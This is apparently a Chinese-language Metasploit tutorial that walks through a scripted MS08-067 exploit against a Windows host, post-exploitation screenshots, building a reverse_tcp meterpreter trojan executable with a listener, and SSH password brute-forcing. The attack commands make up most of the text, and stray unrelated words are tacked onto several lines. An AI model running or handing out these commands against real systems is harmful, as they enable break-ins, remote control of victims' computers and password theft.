1.經過腳本快速攻擊shell
2.後滲透攻擊續windows
1.經過腳本快速攻擊api
咱們能夠經過msfconsole -x 「msfconsole內輸入的命令」實現快速攻擊,進一步,咱們能夠將攻擊須要執行的命令寫成腳本,進行攻擊。服務器
(1)編輯腳本session
vi abin.rc
輸入如下內容。(根據實際狀況修改)ssh
use exploit/windows/smb/ms08_067_netapi set RHOST 192.168.183.132 set LHOST 192.168.183.131 exploit
(2)執行腳本tcp
msfconsole -r abin.rc
經過之星腳本文件,直接攻擊成功,獲取shell。工具
補充:若是同時攻擊成功多個主機,能夠經過sessions來管理。線程
background 將當前會話放在後臺 sessions -l 查看已經創建的會話 sessions -i 1 進入會話
2.後滲透攻擊續3d
(1)截取屏幕
因爲截屏須要在圖形界面才能夠看到,因此咱們先進入圖形界面。
startx msfconsole -r abin.rc screenshot (截屏)
截取的對方桌面:
其餘命令能夠經過輸入 ? 查看:
(2)木馬攻擊
1.生成木馬文件
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.138.129 LPORT=5555 X >abin.exe
2.木馬服務器配置
進入msfconsole,使用對應模塊,這裏使用exploit/multi/handler模塊:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.183.129 (設置監聽主機,也就是bt5的地址)
set LPORT 5555 (設置監聽端口,也就是上面的5555)
exploit (進入監聽模式)
當有主機運行咱們開始生成的木馬程序,就能夠得到對方主機shell。
3.暴力破解
(1)使用msf自帶模塊進行暴力破解
進入msfconsole控制檯:
msfconsole
使用auxiliary/scanner/ssh/ssh_login模塊:
use auxiliary/scanner/ssh/ssh_login
show options
設置目標主機:
set RHOSTS 192.168.183.130
設置用戶名:
set USERNAME msfadmin
也能夠使用:set USER_FILE 從字典讀取用戶名。
設置密碼字典:
set PASS_FILE pass.txt
pass.txt是我本身編寫的一個簡單字典,也能夠根據社會工程學收集的信息,使用工具進行生成。
設置線程:(線程越多,速度越快,固然,須要的電腦配置越高)
set THREADS 10
開始暴力破解:
exploit
咱們能夠看到,已經爆破出ssh登陸密碼。